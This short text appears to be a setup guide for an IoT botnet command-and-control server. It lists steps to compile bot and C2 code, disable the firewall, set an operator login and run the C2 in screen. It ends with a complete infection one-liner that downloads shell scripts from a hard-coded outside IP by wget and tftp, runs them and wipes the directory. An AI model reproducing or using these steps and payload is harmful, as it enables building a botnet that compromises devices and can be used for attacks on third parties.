
1. edit the bot.c file with server, you can change bot port if you want.

2. yum install python-paramiko nano screen gcc perl wget lbzip unzip -y  

3. service httpd restart; service iptables stop

4. sed -i s/1024/9999999/g /usr/include/bits/typesizes.h

5. gcc c2.c -o c2 -pthread; rm -rf c2.c

6. python binary.py bot.c 51.68.202.200

7. echo lucifer lucifer9 >>login_info.txt 

8. echo i like boobs >>motd.txt

8. screen ./c2 118 1 999 (botport you put in bot.c, threads you want to use, c2port your raw connection port)

9. now press 'ctrl a + d'

10. connect using a raw connection type and your c2port

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.166.20.24/Snoopy.sh; chmod 777 Snoopy.sh; sh Snoopy.sh; tftp 188.166.20.24 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 188.166.20.24; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *


